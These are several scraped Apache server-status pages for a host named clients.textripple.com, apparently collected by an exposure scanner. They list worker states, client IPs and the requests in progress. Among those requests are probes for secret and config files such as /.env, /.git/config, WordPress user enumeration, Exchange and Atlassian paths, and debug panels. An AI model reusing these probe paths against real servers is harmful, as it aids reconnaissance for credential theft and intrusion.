0-0987300/224/40486W 17.56000.01.14854.61 96.7.74.198http/1.1crm.textripple.com:443GET / HTTP/1.1 0-0987300/223/40495_ 17.63000.03.95940.81 96.7.74.175http/1.1 0-0987300/231/40610_ 17.63010.04.05843.94 96.7.74.198http/1.1crm.textripple.com:443GET /debug/default/view?panel=config HTTP/1.1 0-0987300/211/40448_ 17.44000.04.01869.37 96.7.74.198http/1.1 1-0238400/573/38292_ 101.89000.011.38900.78 96.7.74.175http/1.1trmm.us:443GET /v2/_catalog HTTP/1.1 1-0238400/568/38079R 101.610190.07.84873.27 174.240.149.27http/1.1trmm.us:443 1-0238400/556/38211_ 101.85000.06.69830.09 96.7.74.198http/1.1 1-0238400/555/38140_ 101.830120.08.98911.73 96.7.74.175http/1.1 1-0238400/560/38206_ 101.54020.011.57932.12 96.7.74.175http/1.1 1-0238400/558/38022_ 101.85010.07.38887.80 96.7.74.175http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0238400/561/38116_ 101.58000.014.07862.88 96.7.74.198http/1.1 1-0238400/554/37985_ 101.620850.09.89870.97 96.7.74.198http/1.1 1-0238400/556/38061_ 101.55014710.014.24839.78 96.7.74.175http/1.1 1-0238400/555/38086_ 101.530280.013.251003.70 96.7.74.175http/1.1 1-0238400/555/38251_ 101.500120.04.23926.34 96.7.74.175http/1.1 1-0238400/575/38143_ 101.84000.031.07889.47 96.7.74.198http/1.1 1-0238400/561/38046_ 101.810140.09.68868.67 96.7.74.198http/1.1 1-0238400/564/38123_ 101.46010.09.13900.16 96.7.74.175http/1.1 1-0238400/563/38049_ 101.85000.09.13926.43 74.207.237.46http/1.1client.simplismarter.com:443GET /fieldPicker/.DS_Store HTTP/1.1 1-0238400/565/38171_ 101.85000.010.31802.25 96.7.74.175http/1.1trmm.us:443GET /info.php HTTP/1.1 1-0238400/548/38088_ 101.87000.010.46890.34 96.7.74.175http/1.1trmm.us:443GET /config.json HTTP/1.1 1-0238400/559/38057W 101.462200.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/185/38922_ 34.43000.06.42870.80 96.7.74.175http/1.1crm.textripple.com:443GET /.git/config HTTP/1.1 2-0865080/186/38923R 34.29000.013.07881.75 174.240.149.27http/1.1trmm.us:443 2-0865080/195/39005_ 34.400110.08.18943.61 96.7.74.175http/1.1crm.textripple.com:443GET / HTTP/1.1 2-0865080/185/38748_ 34.31000.07.62899.51 96.7.74.198http/1.1 2-0865080/197/38907R 34.140190.07.15850.79 96.7.74.175http/1.1 2-0865080/190/38922_ 34.20010.01.46910.16 96.7.74.198http/1.1 2-0865080/195/38917_ 33.810140.05.33888.25 96.7.74.175http/1.1 2-0865080/192/38694_ 33.930180.011.97831.82 96.7.74.175http/1.1 2-0865080/193/38920_ 33.640170.04.73823.40 96.7.74.198http/1.1 2-0865080/187/38768_ 34.160140.07.15858.15 96.7.74.175http/1.1 2-0865080/196/38939_ 34.100150.06.96894.75 96.7.74.198http/1.1 2-0865080/194/38873_ 34.20010.04.42923.07 96.7.74.175http/1.1 2-0865080/186/38880_ 34.080269230.02.487031.41 96.7.74.198http/1.1 2-0865080/193/38858_ 33.86000.05.43920.53 96.7.74.198http/1.1 2-0865080/192/38858_ 34.200
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ca0a1328ca0a13287105d7dc
Apache Status Apache Server Status for clients.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:20 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 21 seconds Server load: 0.26 0.21 0.23 Total accesses: 8186158 - Total Traffic: 207.0 GB CPU Usage: u1336.08 s208.42 cu0 cs0 - .0344% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 17 requests currently being processed, 181 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no14yes315093 123840no6yes216031 286508no5yes117012 3109764no2yes018020 4116801no2yes117001 533086no5yes117031 621767no12yes711045 7125209no6yes018042 8115169no0yes018000 943856no2yes018011 10129613no7yes216006 Sum11061 1718102722 R___W_____W________R_______________W_R__________________________ ______________W__________________W___________R_RW_RR_______R_R__ ________________________________________________________________ RW____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/208/40344_ 17.13020.03.69868.70 96.7.74.198http/1.1 0-0987300/241/40335_ 17.63000.03.87867.78 96.7.74.198http/1.1trmm.us:443GET /login.action HTTP/1.1 0-0987300/256/40552_ 17.48000.02.13988.51 96.7.74.175http/1.1 0-0987300/219/40515_ 17.63000.01.20854.94 96.7.74.198http/1.1crm.textripple.com:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0987300/223/40322W 17.56000.01.12924.75 96.7.74.175http/1.1crm.textripple.com:443GET /server-status HTTP/1.1 0-0987300/242/40604_ 17.63000.04.52963.21 96.7.74.198http/1.1crm.textripple.com:443GET /telescope/requests HTTP/1.1 0-0987300/240/40591_ 17.270180.04.03887.12 96.7.74.198http/1.1 0-0987300/244/40497_ 17.63000.01.42781.01 96.7.74.198http/1.1trmm.us:443GET /api/search?folderIds=0 HTTP/1.1 0-0987300/236/40603_ 17.47000.03.94985.85 96.7.74.175http/1.1 0-0987300/220/40493_ 17.560110.01.24830.92 96.7.74.198http/1.1 0-0987300/243/40326W 17.111300.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/218/40295_ 17.34000.01.11835.96 96.7.74.198http/1.1 0-0987300/213/40501_ 17.63000.01.55867.48 74.207.237.46http/1.1client.simplismarter.com:443GET /js/.DS_Store HTTP/1.1 0-0987300/234/40370_ 17.63010.01.45907.11 96.7.74.198http/1.1crm.textripple.com:443GET /info.php HTTP/1.1 0-0987300/224/40486_ 17.56000.01.14854.61 96.7.74.175http/1.1 0-0987300/223/40495_ 17.63000.03.95940.81 96.7.74.175http/1.1crm.textripple.com:443GET /s/0373e2236313e26333e23323/_/;/META-INF/maven/com.atlassia 0-0987300/231/40610_ 17.63010.04.05843.94 96.7.74.198http/1.1crm.textripple.com:443GET /debug/default/view?panel=config HTTP/1.1 0-0987300/211/40448_ 17.44000.04.01869.37 96.7.74.175http/1.1 1-0238400/573/38292_ 101.89000.011.38900.78 96.7.74.175http/1.1trmm.us:443GET /v2/_catalog HTTP/1.1 1-0238400/568/38079R 101.610190.07.84873.27 174.240.149.27http/1.1trmm.us:443 1-0238400/556/38211_ 101.85000.06.69830.09 96.7.74.198http/1.1 1-0238400/555/38140_ 101.830120.08.98911.73 96.7.74.175http/1.1 1-0238400/560/38206_ 101.54020.011.57932.12 96.7.74.175http/1.1 1-0238400/558/38022_ 101.85010.07.38887.80 96.7.74.175http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0238400/561/38116_ 101.58000.014.07862.88 96.7.74.198http/1.1 1-0238400/554/37985_ 101.620850.09.89870.97 96.7.74.198http/1.1 1-0238400/556/38061_ 101.55014710.014.24839.78 96.7.74.175http/1.1 1-0238400/555/38086_ 101.530280.013.251003.70 96.7.74.175http/1.1 1-0238400/555/38251_ 101.500120.04.23926.34 96.7.74.175http/1.1 1-0238400/575/38143_ 101.84000.031.07889.47 96.7.74.198http/1.1 1-0238400/561/38046_ 101.810140.09.68868.67 96.7.74.198http/1.1 1-0238400/564/38123_ 101.46010.09.13900.16 96.7.74.175http/1.1 1-0238400/563/38049_ 101.85000.09.13926.43 74.207.237.46http/1.1client.simplismarter.com:443GET /fieldPicker/.DS_Store HTTP/1.1 1-0238400/565/38171_ 101.85000.010.31802.25 96.7.74.175http/1.1trmm.us:443GET /info.php HTTP/1.1 1-0238400/548/38088_ 101.87000.010.46890.34 96.7.74.175http/1.1trmm.us:443GET /config.json HTTP/1.1 1-0238400/559/38057W 101.462200.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/185/38922_ 34.43000.06.42870.80 96.7.74.175http/1.1crm.textripple.com:443GET /.git/config HTTP/1.1 2-0865080/186/38923R 34.29000.013.07881.75 174.240.149.27http/1.1trmm.us:443 2-0865080/195/39005_ 34.400110.08.18943.61 96.7.74.175http/1.1crm.textripple.com:443GET / HTTP/1.1 2-0865080/185/38748_ 34.31000.07.62899.51 96.7.74.198http/1.1 2-0865080/197/38907_ 34.140190.07.15850.79 96.7.74.175http/1.1 2-0865080/190/38922_ 34.20010.01.46910.16 96.7.74.198http/1.1 2-0865080/195/38917_ 33.810140.05.33888.25 96.7.74.175http/1.1 2-0865080/192/38694_ 33.930180.011.97831.82 96.7.74.175http/1.1 2-0865080/193/38920_ 33.640170.04.73823.40 96.7.74.175http/1.1 2-0865080/187/38768_ 34.160140.07.15858.15 96.7.74.175http/1.1 2-0865080/196/38939_ 34.100150.06.96894.75 96.7.74.198http/1.1 2-0865080/194/38873_ 34.20010.04.42923.07 96.7.74.175http/1.1 2-0865080/186/38880_ 34.080269230.02.487031.41 96.7.74.198http/1.1 2-0865080/193/38858_ 33.86000.05.43920.53 96.7.74.198http/1.1 2-0865080/192/38858_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ca0a1328ca0a132873098380
Apache Status Apache Server Status for clients.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 25-Dec-2022 00:42:55 UTC Restart Time: Sunday, 04-Dec-2022 23:02:10 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 20 days 1 hour 40 minutes 44 seconds Server load: 0.49 0.32 0.25 Total accesses: 4719172 - Total Traffic: 165.0 GB CPU Usage: u1151.58 s139.35 cu0 cs0 - .0744% CPU load 2.72 requests/sec - 99.8 kB/second - 36.7 kB/request 7 requests currently being processed, 173 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 087005no0yes018000 158167no11yes315080 212593no1yes216000 444247no0yes018000 517488no3yes018030 662667no2yes018020 769455no0yes018000 824218no0yes117000 9100094no1yes018010 1031275no5yes117050 Sum10023 71730190 __________________W________RR_________________R_____W_.......... ........________________________________________________________ ______________________W____________________________________R____ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0870050/429/21440_ 55.827230.016.27670.17 2.18.255.140http/1.1 0-0870050/436/21472_ 55.94600.09.25724.50 2.18.255.105http/1.1crm.textripple.com:443GET /videos/.DS_Store HTTP/1.1 0-0870050/427/21425_ 55.95400.016.68703.92 2.18.255.105http/1.1localhost:80GET /v2/_catalog HTTP/1.1 0-0870050/422/21473_ 55.93700.014.17691.89 2.18.255.105http/1.1crm.textripple.com:443GET /includes/.DS_Store HTTP/1.1 0-0870050/443/21638_ 55.95400.020.58729.42 2.18.255.105http/1.1localhost:80GET / HTTP/1.1 0-0870050/411/21349_ 55.95400.013.09743.71 2.18.255.105http/1.1localhost:80GET / HTTP/1.1 0-0870050/423/21525_ 55.97200.013.26667.23 2.18.255.105http/1.1localhost:80GET /.env HTTP/1.1 0-0870050/441/21469_ 55.95400.033.04722.46 2.18.255.105http/1.1trmm.us:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0870050/431/21401_ 55.96400.08.95721.43 2.18.255.105http/1.1crm.sprout.online:80GET /debug/default/view?panel=config HTTP/1.1 0-0870050/433/21381_ 55.95400.07.82686.65 2.18.255.105http/1.1trmm.us:80GET /.git/config HTTP/1.1 0-0870050/439/21460_ 55.94700.013.10683.40 2.18.255.105http/1.1crm.textripple.com:443GET /js/.DS_Store HTTP/1.1 0-0870050/433/21359_ 55.97200.012.66709.79 2.18.255.105http/1.1crm.sprout.online:80GET /debug/default/view?panel=config HTTP/1.1 0-0870050/434/21350_ 55.92810.012.94769.82 2.18.255.105http/1.1crm.textripple.com:443GET /dal/.DS_Store HTTP/1.1 0-0870050/438/21596_ 55.94710.017.94710.77 2.18.255.105http/1.1crm.textripple.com:443GET /mms/.DS_Store HTTP/1.1 0-0870050/442/21525_ 55.94600.014.30703.18 2.18.255.105http/1.1crm.textripple.com:443GET /test/.DS_Store HTTP/1.1 0-0870050/433/21447_ 55.92710.017.67633.17 2.18.255.105http/1.1crm.textripple.com:443GET /fieldPicker/.DS_Store HTTP/1.1 0-0870050/421/21550_ 55.94600.011.67717.86 2.18.255.105http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 0-0870050/429/21433_ 55.96400.012.38641.45 2.18.255.105http/1.1crm.sprout.online:80GET /.env HTTP/1.1 1-0581670/413/22900W 49.58300.09.04799.10 166.182.86.182http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0581670/413/23010_ 49.67000.09.69830.76 2.18.255.73http/1.1trmm.us:443GET /info.php HTTP/1.1 1-0581670/423/22899_ 49.64200.07.23817.71 2.18.255.105http/1.1crm.sprout.online:80GET /.git/config HTTP/1.1 1-0581670/430/22869_ 49.64200.01.88716.54 2.18.255.73http/1.1localhost:80GET / HTTP/1.1 1-0581670/409/22891_ 49.69000.04.98785.81 2.18.255.105http/1.1crm.textripple.com:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-0581670/423/22690_ 49.64200.025.24821.17 2.18.255.105http/1.1crm.sprout.online:80GET / HTTP/1.1 1-0581670/407/22763_ 49.67000.010.09767.25 2.18.255.105http/1.1trmm.us:443GET /.DS_Store HTTP/1.1 1-0581670/415/22947_ 49.67000.07.21830.28 2.18.255.73http/1.1trmm.us:443GET /.git/config HTTP/1.1 1-0581670/411/22889_ 49.65000.08.07786.59 2.18.255.105http/1.1trmm.us:443GET /.env HTTP/1.1 1-0581670/416/22705R 49.643150.012.82885.45 2.18.255.73http/1.1crm.textripple.com:443 1-0581670/415/22916L 49.64000.012.67759.59 2.18.255.105http/1.1crm.textripple.com:443GET /s/035323e2030313e27313e223/_/;/META-INF/maven/com.atlassia 1-0581670/410/22838_ 49.680110.04.86784.30 2.18.255.73http/1.1crm.textripple.com:443GET / HTTP/1.1 1-0581670/416/22892_ 49.64200.015.48847.74 2.18.255.105http/1.1localhost:80GET /telescope/requests HTTP/1.1 1-0581670/403/22734_ 49.67010.02.60812.33 2.18.255.105http/1.1trmm.us:443GET / HTTP/1.1 1-0581670/419/23007_ 49.670110.022.62745.81 2.18.255.73http/1.1trmm.us:443GET /server-status HTTP/1.1 1-0581670/419/22857_ 49.67000.05.76707.61 2.18.255.73http/1.1trmm.us:443GET /s/035323e2030313e27313e223/_/;/META-INF/maven/com.atlassia 1-0581670/394/22784_ 49.64200.04.49796.24 2.18.255.105http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0581670/408/22885_ 49.65000.02.08744.58 2.18.255.105http/1.1trmm.us:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-0125930/392/21252_ 80.1592150.013.86683.57 127.0.0.1http/1.1 2-0125930/393/21217_ 80.6790180.015.09660.04 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/389/21239_ 80.8151150.014.61713.43 2.18.255.73http/1.1crm.sprout.online:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0125930/399/21324_ 80.64121150.011.03714.79 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/392/21175_ 80.771000.016.31674.05 45.33.108.188http/1.1client.simplismarter.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0125930/389/21244_ 80.82410.016.44787.69 2.18.255.73http/1.1crm.sprout.online:443GET /config.json HTTP/1.1 2-0125930/389/21226_ 80.60154790.022.90697.47 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/390/21377_ 80.7057170.011.01672.29 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/402/21314_ 80.7243420.020.08695.48 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/387/21274_ 80.7147810.011.76
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ca0a1328ca0a1328dc0a2118
Apache Status Apache Server Status for clients.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 25-Dec-2022 00:42:46 UTC Restart Time: Sunday, 04-Dec-2022 23:02:10 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 20 days 1 hour 40 minutes 36 seconds Server load: 0.49 0.31 0.25 Total accesses: 4718939 - Total Traffic: 165.0 GB CPU Usage: u1150.84 s139.17 cu0 cs0 - .0744% CPU load 2.72 requests/sec - 99.8 kB/second - 36.7 kB/request 6 requests currently being processed, 174 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 087005no5yes117002 158167no13yes117083 212593no1yes018000 444247no0yes018000 517488no3yes117020 662667no3yes018021 769455no6yes018042 824218no2yes117000 9100094no4yes216011 1031275no4yes018031 Sum10041 617402010 __W________________R__________________________________.......... ........__________________________________R_____________________ ________________R___________________R______________R____________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0870050/429/21440_ 55.8210230.016.27670.17 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/435/21471_ 55.85100.09.25724.49 45.33.108.188http/1.1client.simplismarter.com:80GET /.git/config HTTP/1.1 0-0870050/425/21423W 55.72000.016.66703.90 2.18.255.105http/1.1crm.textripple.com:443GET /server-status HTTP/1.1 0-0870050/421/21472_ 55.45670.014.17691.89 2.18.255.140http/1.1 0-0870050/442/21637_ 55.88000.020.58729.42 2.18.255.105http/1.1crm.textripple.com:443GET /info.php HTTP/1.1 0-0870050/410/21348_ 55.86100.013.09743.70 45.33.108.188http/1.1client.simplismarter.com:80GET /config.json HTTP/1.1 0-0870050/421/21523_ 55.78501150.013.26667.23 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/440/21468_ 55.680130.033.04722.46 45.33.108.188http/1.1 0-0870050/429/21399_ 55.7665780.08.95721.43 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/432/21380_ 55.88000.07.82686.65 2.18.255.105http/1.1crm.textripple.com:443GET /telescope/requests HTTP/1.1 0-0870050/438/21459_ 55.835150.013.09683.40 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/431/21357_ 55.7851190.012.65709.78 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/433/21349_ 55.7942100.012.94769.82 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0870050/437/21595_ 55.842760.017.94710.77 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/441/21524_ 55.85100.014.29703.18 45.33.108.188http/1.1localhost:80HELP 0-0870050/432/21446_ 55.811900.017.67633.17 23.56.175.29http/1.1localhost:80GET / HTTP/1.1 0-0870050/420/21549_ 55.842120.011.67717.86 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0870050/428/21432_ 55.7670140.012.38641.45 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0581670/411/22898_ 49.46010.09.03799.09 2.18.255.73http/1.1trmm.us:443GET / HTTP/1.1 1-0581670/409/23006R 49.371150.09.69830.75 45.33.108.188http/1.1 1-0581670/419/22895_ 49.340170.07.21817.69 45.33.108.188http/1.1 1-0581670/426/22865_ 49.46000.01.88716.53 2.18.255.105http/1.1trmm.us:443GET /.git/config HTTP/1.1 1-0581670/404/22886_ 49.311480.04.97785.80 45.33.108.188http/1.1 1-0581670/419/22686_ 49.4401570.025.23821.16 2.18.255.56http/1.1crm.sprout.online:443GET / HTTP/1.1 1-0581670/403/22759_ 49.40000.010.08767.24 2.18.255.140http/1.1 1-0581670/411/22943_ 49.48000.07.20830.27 2.18.255.105http/1.1crm.textripple.com:443GET /.env HTTP/1.1 1-0581670/407/22885_ 49.46000.08.07786.59 2.18.255.73http/1.1trmm.us:443GET /config.json HTTP/1.1 1-0581670/412/22701_ 49.38020.012.79885.42 2.18.255.140http/1.1 1-0581670/411/22912_ 49.320160.012.65759.57 107.115.207.47http/1.1 1-0581670/405/22833_ 49.320140.04.84784.28 45.33.108.188http/1.1 1-0581670/412/22888_ 49.390150.015.48847.73 2.18.255.140http/1.1 1-0581670/399/22730_ 49.48020.02.59812.32 2.18.255.105http/1.1crm.textripple.com:443GET /.DS_Store HTTP/1.1 1-0581670/415/23003_ 49.460190.022.54745.73 23.54.163.142http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0581670/416/22854_ 49.480710.05.76707.61 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0581670/391/22781_ 49.450100.04.48796.23 2.18.255.56http/1.1crm.textripple.com:443GET / HTTP/1.1 1-0581670/404/22881_ 49.46000.02.07744.57 2.18.255.105http/1.1trmm.us:443GET /.env HTTP/1.1 2-0125930/392/21252_ 80.1583150.013.86683.57 127.0.0.1http/1.1 2-0125930/393/21217_ 80.6781180.015.09660.04 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/388/21238_ 80.5419820.014.54713.37 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0125930/399/21324_ 80.64113150.011.03714.79 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/392/21175_ 80.77100.016.31674.05 45.33.108.188http/1.1client.simplismarter.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0125930/388/21243_ 80.54197160.016.44787.68 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/389/21226_ 80.60145790.022.90697.47 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/390/21377_ 80.7048170.011.01672.29 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/402/21314_ 80.7235420.020.08695.48 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/387/21274_ 80.7139810.011.76693.19 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/375/21327_ 80.55196150.013.53636.03 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ca0a1328ca0a1328cc487153
Apache Status Apache Server Status for clients.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:20 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 7 minutes 59 seconds Server load: 0.24 0.40 0.52 Total accesses: 20260001 - Total Traffic: 725.4 GB CPU Usage: u3215.24 s349.9 cu0 cs0 - .0574% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 17 requests currently being processed, 181 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no23yes3150191 194454no4yes216002 251755no3yes018012 3112428no22yes6120160 461164no14yes0180103 546522no4yes117020 6125153no5yes216030 7110199no1yes117000 899710no17yes2160151 9100664no8yes018071 1085785no6yes018060 Sum110107 1718107910 ______R____R____W_______________R_R______________________RRR____ RR__R________________________________R__________R___R_________R_ _____________________________R__R_______________________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/372/94003_ 34.82000.09.003072.14 2.18.255.140http/1.1 0-0404470/390/94025_ 34.85000.08.103027.17 2.18.255.73http/1.1crm.sprout.online:80GET /v2/_catalog HTTP/1.1 0-0404470/385/93841_ 34.80000.04.113042.70 2.18.255.73http/1.1 0-0404470/379/93648_ 34.85000.09.863106.89 2.18.255.73http/1.1crm.sprout.online:80GET /about HTTP/1.1 0-0404470/396/93885_ 34.85000.05.449251.75 188.166.147.46http/1.1client.simplismarter.com:443GET /test/.DS_Store HTTP/1.1 0-0404470/383/93699_ 34.83000.07.333136.41 2.18.255.73http/1.1crm.sprout.online:80GET /debug/default/view?panel=config HTTP/1.1 0-0404470/369/93815_ 34.86000.03.273033.51 2.18.255.105http/1.1crm.textripple.com:443GET /.git/config HTTP/1.1 0-0404470/382/93923_ 34.82000.02.573105.31 2.18.255.105http/1.1 0-0404470/382/93925_ 34.79000.05.553111.34 2.18.255.73http/1.1 0-0404470/389/93742_ 33.910170.017.613204.24 2.18.255.73http/1.1 0-0404470/395/93855_ 34.84000.014.042995.43 2.18.255.73http/1.1localhost:80GET /about HTTP/1.1 0-0404470/372/93885R 34.83000.010.282985.04 2.18.255.73http/1.1trmm.us:80GET /about HTTP/1.1 0-0404470/388/93865_ 34.80000.05.053027.46 2.18.255.73http/1.1 0-0404470/399/93664_ 34.82000.05.003032.88 2.18.255.73http/1.1localhost:80GET /v2/_catalog HTTP/1.1 0-0404470/392/93931_ 34.83000.011.862988.44 2.18.255.105http/1.1crm.sprout.online:80GET /server-status HTTP/1.1 0-0404470/385/93626_ 34.83000.04.873182.69 2.18.255.105http/1.1crm.sprout.online:80GET / HTTP/1.1 0-0404470/390/93795W 34.78000.06.803015.32 2.18.255.105http/1.1crm.textripple.com:443GET /server-status HTTP/1.1 0-0404470/381/93872_ 34.78000.09.423060.00 2.18.255.105http/1.1 1-0944540/427/98988_ 86.750140.013.703174.88 2.18.255.105http/1.1 1-0944540/425/99008_ 86.3901150.018.053230.87 2.18.255.73http/1.1 1-0944540/410/98770R 86.95000.012.153192.26 2.18.255.105http/1.1 1-0944540/418/98444_ 86.88010.014.533256.26 2.18.255.73http/1.1 1-0944540/420/98864_ 86.89000.015.899440.25 2.18.255.73http/1.1 1-0944540/421/98725_ 86.490150.015.713139.65 2.18.255.73http/1.1 1-0944540/430/98937_ 86.74010.05.733143.20 2.18.255.73http/1.1 1-0944540/429/99017_ 86.96000.012.173122.97 2.18.255.73http/1.1 1-0944540/429/99145_ 86.740130.010.383174.74 2.18.255.105http/1.1 1-0944540/442/98816_ 86.860720.015.313112.75 2.18.255.73http/1.1 1-0944540/427/98656_ 86.810140.023.983228.60 2.18.255.105http/1.1 1-0944540/423/98986_ 86.96000.019.383343.64 2.18.255.73http/1.1 1-0944540/431/99134_ 86.96000.014.583314.31 2.18.255.73http/1.1 1-0944540/414/99182_ 86.440120.024.323260.74 2.18.255.73http/1.1 1-0944540/417/98922R 86.750740.05.693206.38 2.18.255.73http/1.1crm.textripple.com:443 1-0944540/428/98749_ 86.7701590.011.119424.45 2.18.255.73http/1.1 1-0944540/434/98932R 86.762150.017.253208.65 174.211.38.70http/1.1 1-0944540/440/99071_ 86.80020.021.763257.09 2.18.255.105http/1.1 2-0517550/835/102871_ 131.041170.020.583216.97 2.18.255.105http/1.1 2-0517550/855/102726_ 130.851180.032.213162.47 2.18.255.73http/1.1 2-0517550/832/102937_ 130.570170.028.383393.79 2.18.255.105http/1.1 2-0517550/825/102950_ 131.06110.020.353177.55 2.18.255.73http/1.1 2-0517550/812/102770_ 131.02100.023.903349.39 2.18.255.105http/1.1 2-0517550/819/103075_ 131.041840.024.553310.70 2.18.255.73http/1.1 2-0517550/822/102793_ 131.28000.035.343287.32 2.18.255.105http/1.1 